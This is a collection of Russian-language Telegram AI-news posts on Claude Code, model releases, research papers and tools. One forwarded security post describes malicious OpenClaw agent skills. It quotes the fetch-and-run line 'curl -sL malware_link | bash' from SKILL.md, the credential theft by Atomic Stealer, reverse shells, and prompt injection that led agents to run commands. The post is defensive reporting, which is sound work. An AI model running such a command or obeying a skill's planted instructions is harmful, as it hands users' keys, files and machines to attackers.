Forwarded from Machinelearning
Y Combinator выложил на Youtube почти часовой выпуск подкаста Lightcone Podcast с Борисом Черным, создателем Claude Code в Anthropic. Мы собрали для вас ключевые темы, цитаты и утверждения.
Стратегия Anthropic при создании инструментов заключается в опережении текущих возможностей ИИ.
Главный совет фаундерам: не подстраивайте продукт под ограничения сегодняшних моделей. Стройте его для модели, которая выйдет через полгода. Если сегодня модель глупая, через 6 месяцев она поумнеет, и ваш продукт должен быть к этому готов.
Принцип "Scaffolding" : обвязка вокруг модели может улучшить производительность на 10-20%, но следующая версия модели часто нивелирует этот выигрыш. Либо вы строите обвязку для временного прироста, либо ждете новую модель и получаете прирост бесплатно.
CLAUDE.md часто переусложняют. Борис рекомендует удалять его и начинать заново, так как с каждой новой моделью требуется меньше инструкций.
Внутренняя статистика Anthropic показывает радикальное изменение в процессах разработки.
Инженер Anthropic сейчас в 1000 раз продуктивнее инженера Google на пике их формы.
После внедрения Claude Code продуктивность внутри Anthropic выросла на 150% (измеряется по количеству PR, коммитов и их жизненному циклу). Ранее годовой рост на 2% считался успехом (личный опыт Бориса у Цукерберга).
CEO Anthropic предсказывал, что 90% кода будет писать ИИ. Борис утверждает, что с выходом Opus 4.5 эта цифра достигла 100%.
Борис удалил свою IDE. Он не редактирует ни одной строчки кода вручную. Весь процесс идет через Claude Code в терминале.
Первый инструмент, который дали модели был bash.
Инженер Anthropic Крис нашел утечку памяти, просто попросив Claude Code: "Найди утечку". Агент снял heap dump, написал инструмент для анализа дампа, нашел утечку и предложил фикс быстрее человека.
Рекурсивная отладка: можно загрузить транскрипт сессии кодинга обратно в Claude, чтобы отладить самого агента.
Идея CLAUDE.md родилась из наблюдения скрытого спроса: инженеры сами писали markdown-файлы с контекстом для скармливания модели.
Личный CLAUDE.md Бориса содержит всего две строки:
1. При создании PR включать auto-merge.
2. Постить ссылку на PR во внутренний канал Slack.
Если Claude совершает ошибку, команда тегает его в PR (командой /add claude), чтобы он исправил код и обновил правила в CLAUDE.md для предотвращения рецидивов.
Эволюция идет от простого выполнения команд к сложному планированию и роям агентов.
Plan Mode: Режим, где модель сначала расписывает шаги, а потом выполняет.
Промпт для Plan Mode технически прост: к запросу добавляется фраза "Пожалуйста, не пиши код, а сначала спланируй".
Функция "Plugins" была написана роем агентов за выходные без участия человека: инженеры дали спецификацию и доступ к Asana. Главный агент спавнил субагентов, раздавал задачи из доски, а те писали код.
Стратегия "Mama Claude": основной инстанс Claude Code рекурсивно вызывает субагентов (другие инстансы Claude Code) для решения подзадач.
Биомодальное распределение эффективных сотрудников:
Гипер-специалисты: кандидаты с глубоким знанием devtools, runtime, оптимизаций.
Гипер-дженералисты: люди, совмещающие роли Product, Infra, Design.
Product Engineer исчезает как термин, все становятся "Builders".
В Anthropic код пишут все: дизайнеры, финансисты и менеджеры.
@ai_machinelearning_big_data
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍6
Forwarded from Machinelearning
⚡️ VK внедряет VLM в поиск VK Видео
VK начала внедрение визуально-языковых моделей в поисковые системы своих продуктов. Технология уже работает в VK Видео. Теперь система анализирует не только название и описание ролика, но и сами кадры, звук и видеоряд.
Тестирование гипотез ускорилось в 5 раз, новые улучшения внедряются заметно быстрее, а поиск будет развиваться динамичнее.
Технология также усилит векторный поиск. Система будет опираться не только на семантическое совпадение слов, но и на реальное содержание видео через анализ аудио и визуальных признаков.
Подобные мультимодальные подходы развивают Microsoft, Google и TikTok. Обновление поэтапно появится и в других сервисах VK.
@ai_machinelearning_big_data
#news #ai #ml #VK
VK начала внедрение визуально-языковых моделей в поисковые системы своих продуктов. Технология уже работает в VK Видео. Теперь система анализирует не только название и описание ролика, но и сами кадры, звук и видеоряд.
Тестирование гипотез ускорилось в 5 раз, новые улучшения внедряются заметно быстрее, а поиск будет развиваться динамичнее.
Технология также усилит векторный поиск. Система будет опираться не только на семантическое совпадение слов, но и на реальное содержание видео через анализ аудио и визуальных признаков.
Подобные мультимодальные подходы развивают Microsoft, Google и TikTok. Обновление поэтапно появится и в других сервисах VK.
@ai_machinelearning_big_data
#news #ai #ml #VK
😁14❤12💊5👍3🥰3👏2🔥1
Forwarded from Kali Linux
В маркетплейсе навыков OpenClaw самый скачиваемый скилл оказался вредоносным.
Что произошло
- Обнаружено 1 184 вредоносных навыка
- Один атакующий загрузил 677 пакетов
- Плагины маскировались под:
- crypto-боты
- YouTube-саммаризаторы
- wallet-трекеры
- Документация выглядела профессионально и вызывала доверие
Как работала атака
В файле SKILL.md скрывалась инструкция:
curl -sL malware_link | bashПосле выполнения устанавливался Atomic Stealer (macOS), который собирал:
- пароли браузеров
- SSH-ключи
- Telegram-сессии
- криптокошельки
- API-ключи из .env
- данные из Keychain
На других системах открывался reverse shell — атакующий получал полный удалённый доступ к машине.
Дополнительно
- Топ-1 скилл (What Would Elon Do) содержал 9 уязвимостей, из них 2 критические
- Использовал prompt injection для обхода защит
- Рейтинг был накручен
- Скачан тысячи раз
Почему это важно
ClawHub позволял публиковать плагины любому — достаточно GitHub-аккаунта старше одной недели.
Теперь риск выше, чем в классических supply chain атаках.
Раньше:
— вредоносный пакет выполнялся автоматически
Теперь:
— плагин убеждает пользователя или агента выполнить команду
— AI сам может получить доступ к системе, данным и ключам
AI-агенты становятся новой целью supply chain-атак.
Если агент имеет доступ к файлам, терминалу и API — вредоносный скилл получает доступ ко всей цифровой инфраструктуре.
Вывод
Перед установкой AI-плагинов:
- проверяйте исходный код
- не запускайте команды из документации вслепую
- ограничивайте доступ агента к системе и ключам
В эпоху агентного AI безопасность важнее удобства.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10🔥5😱2👍1
Перед вами релиза за февраль… всего за 19 дней мире 👇
19–20 февраля - Gemini 3.1 Pro**
Улучшенное программирование, более сильные агенты, увеличенный контекст.
18 февраля - Google Lyria 3
Генерирует 30-секундные музыкальные треки с вокалом по тексту, изображениям или видео.
17 февраля - Strand-Rust-Coder-14B - модель, заточенная специально под генерациию Rust кода.
17 февраля - Claude Sonnet 4.6
Быстрая модель для программирования и сложного логического рассуждения.
17 февраля - Fujitsu AI Dev Platform
Платформа, которая автоматизирует полный цикл разработки программного обеспечения.
16 февраля - Qwen 3.5
Более дешёвая и мощная модель с упором на агентные сценарии.
12 февраля - Gemini 3 Deep Think
Создана для научных задач и сложных исследований.
12 февраля - MiniMax M2.5
Открытая модель с сильными возможностями в программировании.
12 февраля - Seedance 2.0
Реалистичное генеративное видео 1080p по тексту.
11 февраля - GLM-5
Крупная открытая модель с сильным логическим мышлением.
10 февраля - RynnBrain
AI для робототехники и работы с физическим миром.
5 февраля - Claude Opus 4.6*
Крупное обновление для программирования и работы с инструментами.
5 февраля - GPT-5.3 Codex
Более быстрый GPT, ориентированный на разработку.
5 февраля - Kling 3.0
Генерация видео в 4K со звуком.
Темп ИИ-релизов уже измеряется не месяцами - днями.
@machinelearning_interview
19–20 февраля - Gemini 3.1 Pro**
Улучшенное программирование, более сильные агенты, увеличенный контекст.
18 февраля - Google Lyria 3
Генерирует 30-секундные музыкальные треки с вокалом по тексту, изображениям или видео.
17 февраля - Strand-Rust-Coder-14B - модель, заточенная специально под генерациию Rust кода.
17 февраля - Claude Sonnet 4.6
Быстрая модель для программирования и сложного логического рассуждения.
17 февраля - Fujitsu AI Dev Platform
Платформа, которая автоматизирует полный цикл разработки программного обеспечения.
16 февраля - Qwen 3.5
Более дешёвая и мощная модель с упором на агентные сценарии.
12 февраля - Gemini 3 Deep Think
Создана для научных задач и сложных исследований.
12 февраля - MiniMax M2.5
Открытая модель с сильными возможностями в программировании.
12 февраля - Seedance 2.0
Реалистичное генеративное видео 1080p по тексту.
11 февраля - GLM-5
Крупная открытая модель с сильным логическим мышлением.
10 февраля - RynnBrain
AI для робототехники и работы с физическим миром.
5 февраля - Claude Opus 4.6*
Крупное обновление для программирования и работы с инструментами.
5 февраля - GPT-5.3 Codex
Более быстрый GPT, ориентированный на разработку.
5 февраля - Kling 3.0
Генерация видео в 4K со звуком.
Темп ИИ-релизов уже измеряется не месяцами - днями.
@machinelearning_interview
🔥9❤3👍2
💼 5 AI-репозиториев, которые реально помогут устроиться на работу в 2026
Сохрани себе - это готовые идеи, которые можно собрать в портфолио и показать на собесе.
1) RAG с нуля (RAG from Scratch)
Поймёшь, как устроены retrieval, embeddings, чанкинг, ранжирование и ответы LLM.
GitHub: https://github.com/langchain-ai/rag-from-scratch
2) AI-агент для соцсетей (Social Media Agent)
Автоматизация контента: генерация постов, планирование, работа с трендами.
GitHub: https://github.com/langchain-ai/social-media-agent
3) Анализ медицинских изображений (Medical Image Analysis)
Компьютерное зрение + реальные кейсы: классификация, сегментация, пайплайны.
GitHub: https://github.com/databricks-industry-solutions/pixels
4) MCP Tool-Calling агенты
Агенты, которые умеют вызывать инструменты и внешние сервисы (LangGraph + MCP).
Notebook: https://docs.databricks.com/aws/en/notebooks/source/generative-ai/langgraph-mcp-tool-calling-agent.html
5) AI-ассистент с памятью (Assistant with Memory)
Персонализация: хранение контекста, long-term memory, улучшение диалогов со временем.
GitHub: https://github.com/Makememo/MemoAI
Если хочешь войти в AI - собирай не “игрушки”, а проекты, которые показывают реальные навыки.
Сохрани себе - это готовые идеи, которые можно собрать в портфолио и показать на собесе.
1) RAG с нуля (RAG from Scratch)
Поймёшь, как устроены retrieval, embeddings, чанкинг, ранжирование и ответы LLM.
GitHub: https://github.com/langchain-ai/rag-from-scratch
2) AI-агент для соцсетей (Social Media Agent)
Автоматизация контента: генерация постов, планирование, работа с трендами.
GitHub: https://github.com/langchain-ai/social-media-agent
3) Анализ медицинских изображений (Medical Image Analysis)
Компьютерное зрение + реальные кейсы: классификация, сегментация, пайплайны.
GitHub: https://github.com/databricks-industry-solutions/pixels
4) MCP Tool-Calling агенты
Агенты, которые умеют вызывать инструменты и внешние сервисы (LangGraph + MCP).
Notebook: https://docs.databricks.com/aws/en/notebooks/source/generative-ai/langgraph-mcp-tool-calling-agent.html
5) AI-ассистент с памятью (Assistant with Memory)
Персонализация: хранение контекста, long-term memory, улучшение диалогов со временем.
GitHub: https://github.com/Makememo/MemoAI
Если хочешь войти в AI - собирай не “игрушки”, а проекты, которые показывают реальные навыки.
👍16😍8❤6💘2🙈1
🧬 Qwen3-Coder-Next стал доступен через API
Alibaba выпустила open-source версию Qwen3-Coder-Next и открыла к ней доступ через Alibaba Cloud Model Studio.
Теперь модель можно использовать в продакшене без локального развёртывания — через масштабируемые и экономичные API-эндпоинты.
Что доступно:
- API для интеграции в приложения и инструменты разработки
- Поддержка в Coding Plan для команд и enterprise-сценариев
- Масштабирование под нагрузку
- Оплата по использованию
Подходит для:
- AI-ассистентов для разработки
- генерации и рефакторинга кода
- CI/CD-автоматизации
- агентных систем и DevOps-инструментов
Документация API: https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&url=2840914_2&modelId=qwen3
Подробности Coding Plan:
https://alibabacloud.com/help/en/model-studio/coding-plan
Alibaba выпустила open-source версию Qwen3-Coder-Next и открыла к ней доступ через Alibaba Cloud Model Studio.
Теперь модель можно использовать в продакшене без локального развёртывания — через масштабируемые и экономичные API-эндпоинты.
Что доступно:
- API для интеграции в приложения и инструменты разработки
- Поддержка в Coding Plan для команд и enterprise-сценариев
- Масштабирование под нагрузку
- Оплата по использованию
Подходит для:
- AI-ассистентов для разработки
- генерации и рефакторинга кода
- CI/CD-автоматизации
- агентных систем и DevOps-инструментов
Документация API: https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&url=2840914_2&modelId=qwen3
Подробности Coding Plan:
https://alibabacloud.com/help/en/model-studio/coding-plan
👍9❤4🥰4
This media is not supported in your browser
VIEW IN TELEGRAM
POV: вот так выглядит вайб-кодинг:
😁57👍11❤4😱3🔥2🕊2💯1
🧩 Эффективное удаление водяных знаков из видео Sora 2
Инструмент для точного извлечения водяных знаков из видео, созданного с помощью Sora 2. Использует спектральный анализ и алгоритмы фильтрации для удаления водяных знаков без потери качества изображения.
🚀Основные моменты:
- Спектральный анализ для обнаружения водяных знаков
- Фильтрация для плавных переходов между кадрами
- Алгоритмы без артефактов
- Автоматизированный процесс от обнаружения до рендеринга
- Поддержка различных форматов и разрешений
📌 GitHub: https://github.com/trumpet-noek/sora2-free-watermark-remover
Инструмент для точного извлечения водяных знаков из видео, созданного с помощью Sora 2. Использует спектральный анализ и алгоритмы фильтрации для удаления водяных знаков без потери качества изображения.
🚀Основные моменты:
- Спектральный анализ для обнаружения водяных знаков
- Фильтрация для плавных переходов между кадрами
- Алгоритмы без артефактов
- Автоматизированный процесс от обнаружения до рендеринга
- Поддержка различных форматов и разрешений
📌 GitHub: https://github.com/trumpet-noek/sora2-free-watermark-remover
👍7😱6🔥2🗿2💊2
⚡️ Anthropic закрыли своё самое сложное тестовое задание.
Причина - Claude сделал его лучше любого кандидата.
Разбор этого задания показал важную вещь:
оно проверяло не алгоритмы, а инженерное мышление уровня системной оптимизации.
Что это было за задание
Кандидатам нужно было оптимизировать алгоритм под «виртуальный ускоритель» - симуляцию специализированного AI-чипа.
Особенности задачи:
- медленная основная память (DRAM)
- маленькая, но быстрая локальная память (scratchpad)
- параллельное выполнение инструкций (VLIW)
- векторные операции (SIMD)
По сути - оптимизация под архитектуру уровня TPU.
Что проверялось на самом деле
Не знание Python.
А умение:
- минимизировать обращения к памяти
- правильно управлять данными
- распараллеливать вычисления
- мыслить throughput-ом, а не строками кода
Лучшие решения давали ускорение до 65×.
Claude справился с задачей за пару часов и показал результат выше большинства кандидатов.
Это сигнал:
AI уже способен:
- оптимизировать низкоуровневые системы
- понимать архитектурные ограничения
- находить инженерные решения, а не просто генерировать код
Рынок меняется.
AI уже:
- пишет код
- оптимизирует алгоритмы
- ускоряет системы
Теперь ценность разработчика смещается:
не написать код,
а спроектировать систему, ограничения и архитектуру.
Потому что оптимизацию всё чаще делает AI.
https://www.ikot.blog/anthropic-take-home-for-dummies
Причина - Claude сделал его лучше любого кандидата.
Разбор этого задания показал важную вещь:
оно проверяло не алгоритмы, а инженерное мышление уровня системной оптимизации.
Что это было за задание
Кандидатам нужно было оптимизировать алгоритм под «виртуальный ускоритель» - симуляцию специализированного AI-чипа.
Особенности задачи:
- медленная основная память (DRAM)
- маленькая, но быстрая локальная память (scratchpad)
- параллельное выполнение инструкций (VLIW)
- векторные операции (SIMD)
По сути - оптимизация под архитектуру уровня TPU.
Что проверялось на самом деле
Не знание Python.
А умение:
- минимизировать обращения к памяти
- правильно управлять данными
- распараллеливать вычисления
- мыслить throughput-ом, а не строками кода
Лучшие решения давали ускорение до 65×.
Claude справился с задачей за пару часов и показал результат выше большинства кандидатов.
Это сигнал:
AI уже способен:
- оптимизировать низкоуровневые системы
- понимать архитектурные ограничения
- находить инженерные решения, а не просто генерировать код
Рынок меняется.
AI уже:
- пишет код
- оптимизирует алгоритмы
- ускоряет системы
Теперь ценность разработчика смещается:
не написать код,
а спроектировать систему, ограничения и архитектуру.
Потому что оптимизацию всё чаще делает AI.
https://www.ikot.blog/anthropic-take-home-for-dummies
❤21👍5😁4🥰2
🐋 По сообщениям, DeepSeek обучал свою новую модель на новейших чипах NVIDIA Blackwell, несмотря на то, что их поставки в Китай запрещены экспортными ограничениями США.
По словам высокопоставленного американского чиновника, эти ускорители, вероятно, были собраны в кластер в дата-центре во Внутренней Монголии. Также предполагается, что DeepSeek может попытаться скрыть технические следы их использования, что вызывает новые опасения в области национальной безопасности и соблюдения санкций.
https://www.reuters.com/world/china/chinas-deepseek-trained-ai-model-nvidias-best-chip-despite-us-ban-official-says-2026-02-24/
По словам высокопоставленного американского чиновника, эти ускорители, вероятно, были собраны в кластер в дата-центре во Внутренней Монголии. Также предполагается, что DeepSeek может попытаться скрыть технические следы их использования, что вызывает новые опасения в области национальной безопасности и соблюдения санкций.
https://www.reuters.com/world/china/chinas-deepseek-trained-ai-model-nvidias-best-chip-despite-us-ban-official-says-2026-02-24/
🤣16👍7❤5🔥3😁1
Папа Римский призвал священников не использовать ChatGPT для написания проповедей.
На встрече с духовенством Римской епархии Папа Лев XIV предупредил об «искушении» перекладывать подготовку проповедей на искусственный интеллект.
По его словам, если человек перестаёт тренировать собственное мышление, оно постепенно «атрофируется».
Он подчеркнул, что ИИ никогда не сможет по-настоящему проповедовать веру.
Понтифик также отметил, что христианство - это не формальное произнесение молитв, а живые отношения с Богом.
На встрече с духовенством Римской епархии Папа Лев XIV предупредил об «искушении» перекладывать подготовку проповедей на искусственный интеллект.
По его словам, если человек перестаёт тренировать собственное мышление, оно постепенно «атрофируется».
Он подчеркнул, что ИИ никогда не сможет по-настоящему проповедовать веру.
Понтифик также отметил, что христианство - это не формальное произнесение молитв, а живые отношения с Богом.
😁38👍10❤6🤩4💯2
This media is not supported in your browser
VIEW IN TELEGRAM
🧠 Джеффри Хинтон: ИИ может обогнать людей в математике
Хинтон считает, что математика - это «закрытая система», а значит ИИ может работать с ней как с игрой с понятными правилами.
Модели уже умеют:
• ставить себе задачи
• проверять собственные доказательства
• учиться на своих же ошибках — без примеров от людей
💡 Если это случится, ИИ сможет не просто решать задачи, а открывать новые теоремы и методы, двигая науку еще быстрее, чем раньше.
Хинтон считает, что математика - это «закрытая система», а значит ИИ может работать с ней как с игрой с понятными правилами.
Модели уже умеют:
• ставить себе задачи
• проверять собственные доказательства
• учиться на своих же ошибках — без примеров от людей
«Я думаю, что ИИ станет гораздо лучше людей в математике - возможно, уже в ближайшие 10 лет».
💡 Если это случится, ИИ сможет не просто решать задачи, а открывать новые теоремы и методы, двигая науку еще быстрее, чем раньше.
🐳12😁11❤8🕊6🔥5🥰1🍌1
This media is not supported in your browser
VIEW IN TELEGRAM
Идея в том, чтобы модели могли мгновенно адаптироваться к новым задачам или информации — без долгого fine-tuning, сложных пайплайнов и огромных промптов.
Сегодня у LLM есть проблема:
чтобы обучить модель под новую задачу или добавить знания, обычно требуется:
- дорогое и длительное дообучение
- context distillation
- или длинные, затратные по памяти промпты
Sakana AI предложили другой подход.
Они обучили гиперсеть (Hypernetwork), которая генерирует LoRA-адаптеры «на лету».
Теперь вместо сложного процесса оптимизации достаточно одного forward-pass, чтобы:
- адаптировать модель под новую задачу
- или «встроить» в неё новый документ
Что показывают эксперименты:
Text-to-LoRA
- модель специализируется под новую задачу
- достаточно текстового описания на естественном языке
Doc-to-LoRA
- модель может «внутренне запомнить» длинный документ
- показывает почти идеальную точность на задачах, где текст в 5 раз длиннее контекстного окна
- способна переносить визуальные знания из vision-language модели в текстовую LLM
При этом обе технологии работают с задержкой меньше секунды.
Главное значение работы — снижение порога кастомизации.
Вместо сложного ML-процесса пользователь сможет специализировать модель простым текстовым запросом.
Код и исследования уже открыты для сообщества:
Doc-to-LoRA
Paper: https://arxiv.org/abs/2602.15902
Code: https://github.com/SakanaAI/Doc-to-LoRA
Text-to-LoRA
Paper: https://arxiv.org/abs/2506.06105
Code: https://github.com/SakanaAI/Text-to-LoRA
@machinelearning_interview
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10🔥5🥰5
📌 Tencent выпустил новую open-source модель WeDLM-8B-Instruct :
WeDLM-8B-Instruct: модель на ~8 млрд параметров, настроенная для диалогов и выполнения команд. Работает быстрее многих авто-регрессионных моделей и хорошо подходит для практических задач.
🚀 Плюсы
- параллельная генерация — меньше задержек
- поддержка KV-кэша и современных оптимизаций
- в ряде задач быстрее аналогов (до 3–6× на бенчмарках)
📊 Производительность
Модель показывает уверенные результаты на бенчмарках по логике, коду и знаниям, опережая базовые версии в своём классе.
📌 Характеристики
- 8B параметров
- контекст до 32 768 токенов
- лицензия Apache-2.0
🔧 Как начать
Можно запускать через собственный движок WeDLM или через стандартный Transformers API.
👉 Подходит тем, кто хочет быстро и локально развернуть мощную LLM.
Ссылка: https://huggingface.co/tencent/WeDLM-8B-Instruct
WeDLM-8B-Instruct: модель на ~8 млрд параметров, настроенная для диалогов и выполнения команд. Работает быстрее многих авто-регрессионных моделей и хорошо подходит для практических задач.
🚀 Плюсы
- параллельная генерация — меньше задержек
- поддержка KV-кэша и современных оптимизаций
- в ряде задач быстрее аналогов (до 3–6× на бенчмарках)
📊 Производительность
Модель показывает уверенные результаты на бенчмарках по логике, коду и знаниям, опережая базовые версии в своём классе.
📌 Характеристики
- 8B параметров
- контекст до 32 768 токенов
- лицензия Apache-2.0
🔧 Как начать
Можно запускать через собственный движок WeDLM или через стандартный Transformers API.
👉 Подходит тем, кто хочет быстро и локально развернуть мощную LLM.
Ссылка: https://huggingface.co/tencent/WeDLM-8B-Instruct
👍9
ByteDance выпустила новую open-source модель для генерации изображений.
По первым отзывам, она показывает результаты лучше, чем Qwen-Image и Z-Image.
Главная особенность — модель работает в autoregressive-режиме.
Это означает, что изображение создаётся поэтапно, как текст в LLM, а не одним «шумовым» проходом, как в диффузионных моделях.
Такой подход даёт:
- лучшее понимание сцены и объектов
- более логичную композицию
- стабильность персонажей и деталей
- более «осмысленную» генерацию
Похожий принцип уже используют современные системы вроде GPT-Image и других новых генераторов.
GitHub: https://github.com/shallowdream204/BitDance
По первым отзывам, она показывает результаты лучше, чем Qwen-Image и Z-Image.
Главная особенность — модель работает в autoregressive-режиме.
Это означает, что изображение создаётся поэтапно, как текст в LLM, а не одним «шумовым» проходом, как в диффузионных моделях.
Такой подход даёт:
- лучшее понимание сцены и объектов
- более логичную композицию
- стабильность персонажей и деталей
- более «осмысленную» генерацию
Похожий принцип уже используют современные системы вроде GPT-Image и других новых генераторов.
GitHub: https://github.com/shallowdream204/BitDance
👍9❤5
Как развернуть приватную LLM в Kubernetes
Selectel приглашает на вебинар, где покажут, весь путь до готового интерфейса, настройки мониторинга, распределенных моделей, интеграции и даже автоматизации инфраструктуры.
📅 12 марта, 12:00
📍Онлайн
👥Для DevOps и SRE-инженеров, Архитекторов и менеджеров ИТ-инфраструктуры.
👉Смотрите полную программу и регистрируйтесь: https://slc.tl/ak8d6
Чтобы не пропустить вебинар и узнавать о других событиях и бесплатных курсах Selectel, подписывайтесь на @selectel_events
Реклама. АО "Селектел". erid:2W5zFGuQF4d
Selectel приглашает на вебинар, где покажут, весь путь до готового интерфейса, настройки мониторинга, распределенных моделей, интеграции и даже автоматизации инфраструктуры.
📅 12 марта, 12:00
📍Онлайн
👥Для DevOps и SRE-инженеров, Архитекторов и менеджеров ИТ-инфраструктуры.
👉Смотрите полную программу и регистрируйтесь: https://slc.tl/ak8d6
Чтобы не пропустить вебинар и узнавать о других событиях и бесплатных курсах Selectel, подписывайтесь на @selectel_events
Реклама. АО "Селектел". erid:2W5zFGuQF4d
🔥4👍3
В исследовании протестировали 15 топ-моделей (GPT-4.1, Gemini 2.5 Pro, Claude 3.7 Sonnet, o3, DeepSeek R1, Llama 4) на 200 000+ симулированных разговоров.
Результат:
- Один запрос → ~90% качества
- Многотуровый диалог → ~65%
Важно: дело не в «умности» модели. Способность решать задачи снизилась всего на ~15%.
Главная проблема — надёжность: количество ошибок и сбоев выросло на 112%.
Почему диалог ломает модели:
- Модель начинает отвечать до того, как вы дали полный контекст
- Первое неверное предположение закрепляется и тянется дальше
- Теряется часть информации из середины разговора
- Длинные ответы добавляют новые допущения → растёт вероятность ошибок
Что не помогает:
- reasoning-модели (o3, DeepSeek R1)
- больше «thinking tokens»
- температура = 0
Практический вывод:
Если нужна стабильность, давайте весь контекст, требования и ограничения одним сообщением, а не через длинную переписку.
Большинство бенчмарков тестирует single-turn в идеальных условиях.
В реальных диалогах надёжность падает у всех моделей и это критично для AI-агентов и продакшена.
https://arxiv.org/abs/2505.06120
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19👍8❤1
Forwarded from Machinelearning
Microsoft, UIUC и UNC-Chapel Hill разработали систему дообучения VL-моделей для автономного управления графическими интерфейсами.
Авторы обнаружили 2 системных изъяна в существующих пайплайнах обучения GUI-агентов:
Cтандартный SFT с длинными CoT ухудшает визуальную локализацию (чем длиннее рассуждение, тем хуже модель попадает в нужный элемент интерфейса).
Пошаговое RLVR-обучение нестабильно, потому что GUI-среда частично верифицируема. На каждом шаге существует несколько корректных действий, но датасет фиксирует только одно. Как результат - за альтернативные, но правильные действия модель получает штраф.
Метод смешивает данные с рассуждениями и без них, а затем перевзвешивает токены: action- и grounding-токены получают больший вес в лосс-функции, чем токены рассуждений. Это позволяет сохранить способность к CoT, не жертвуя точностью клика.
KL-регуляризация ограничивает дрейф политики относительно референсной модели, что улучшает корреляцию между офлайн- и онлайн-метриками. Success-Adaptive Negative Gradient Scaling динамически снижает вес отрицательных градиентов в зависимости от доли успешных действий в группе GRPO-сэмплов. Это защищает от штрафования валидных, но не задокументированных действий.
Он содержит больше токенов на рассуждение: в среднем 210 на шаг против 85 у AGUVIS Stage 2 L3 и 0 у большинства остальных.
Внутри - существующие открытые наборы, к которым GPT-4.1 дописывал подробные ризонинг-трассы. Фильтровали в два этапа: отсев шагов с точностью воспроизведения ниже 0.3 через Qwen3-VL-8B и верификация координат через bounding-box от Qwen3-VL-32B.
Тестовая GUI-Libra-3B улучшила базовую Qwen2.5-VL-3B на +15.6% по Pass@1 на AndroidControl-v2 и с 3.5 до 25.2 на AndroidWorld.
GUI-Libra-4B/8B на AndroidWorld выбила 42.6 (это столько же, сколько GPT-4o + UGround при использовании двух отдельных VLM-модулей.
Веса всех моделей размерностью 3, 4, 7 и 8 млрд. параметров, целевой датасет и код обучения выложены в открытый доступ.
@ai_machinelearning_big_data
#AI #ML #VLM #GUILibra #Microsoft
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍3🔥3